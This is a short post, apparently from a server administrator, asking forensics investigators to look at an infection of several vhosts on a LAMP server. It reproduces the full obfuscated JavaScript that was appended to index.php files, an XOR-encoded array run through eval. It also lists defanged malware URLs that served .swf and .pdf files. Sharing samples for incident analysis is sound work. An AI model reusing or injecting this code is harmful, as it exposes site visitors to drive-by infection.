Forensics team - please investigate!
I found on my LAMP server several vhosts being hacked. All index.php files were appended with the following script. (included)
My personal (honeypot) PC (with IE8) resolved the hash and made an automatic query to the following addresses:
hxxp://holofader.cn/3/moreBook.swf
hxxp://holofader.cn/3/sByBook.pdf
Possibly the PC is compromized already.
---------
<script>zcsgwzlawtk=new Array(34,41,37,51,43,35,40,50,104,49,52,47,50,35,110,100,122,36,41,34,63,120,122,53,37,52,47,54,50,120,48,39,52,102,3
6,52,37,55,43,62,35,49,48,41,123,97,32,52,97,125,48,39,52,102,33,48,47,43,45,42,36,39,52,51,123,97,47,97,125,48,39,52,102,37,40,63,48,60,42,5
3,34,49,50,51,123,97,43,35,97,125,48,39,52,102,45,46,49,41,35,52,34,55,63,63,63,123,97,39,97,125,48,39,52,102,47,45,42,44,36,32,33,34,50,35,1
23,34,41,37,51,43,35,40,50,125,48,39,52,102,53,55,52,48,40,45,55,43,51,62,47,123,97,49,47,34,50,46,97,125,48,39,52,102,36,39,43,52,63,45,55,4
4,50,39,123,97,46,50,50,54,124,105,105,46,41,42,41,32,39,34,35,52,104,37,40,105,117,105,47,40,34,35,62,104,54,46,54,97,125,48,39,52,102,34,37
,39,44,33,50,41,32,43,35,49,123,97,46,35,47,33,46,50,97,125,48,39,52,102,52,46,62,35,36,51,43,42,49,40,123,97,53,50,63,42,35,97,125,48,39,52,
102,40,43,47,34,48,37,35,55,32,33,52,123,97,119,97,125,48,39,52,102,43,42,37,52,62,46,41,35,63,48,37,123,97,34,47,53,54,42,39,63,124,40,41,40
,35,97,125,48,39,52,102,62,62,54,47,50,34,33,33,54,41,123,97,53,52,37,97,125,48,39,52,102,42,55,41,37,48,48,51,45,47,32,123,47,45,42,44,36,32
,33,34,50,35,104,37,52,35,39,50,35,3,42,35,43,35,40,50,110,33,48,47,43,45,42,36,39,52,51,109,36,52,37,55,43,62,35,49,48,41,109,45,46,49,41,35
,52,34,55,63,63,63,109,37,40,63,48,60,42,53,34,49,50,51,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,53,5
5,52,48,40,45,55,43,51,62,47,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,3
5,110,34,37,39,44,33,50,41,32,43,35,49,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,
36,51,50,35,110,52,46,62,35,36,51,43,42,49,40,106,43,42,37,52,62,46,41,35,63,48,37,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50
,52,47,36,51,50,35,110,62,62,54,47,50,34,33,33,54,41,106,36,39,43,52,63,45,55,44,50,39,111,125,47,45,42,44,36,32,33,34,50,35,104,36,41,34,63,
104,39,54,54,35,40,34,5,46,47,42,34,110,42,55,41,37,48,48,51,45,47,32,111,125,122,105,53,37,52,47,54,50,120,100,111);cxpexelvhw="";ghaceffafi
=70;lerxenrpuun=eval;ykokgwgpdo=String.fromCharCode;for(ftwktbslnxd in zcsgwzlawtk)cxpexelvhw+=ykokgwgpdo(zcsgwzlawtk[ftwktbslnxd]^ghaceffafi
);lerxenrpuun(cxpexelvhw);</script>
--------------------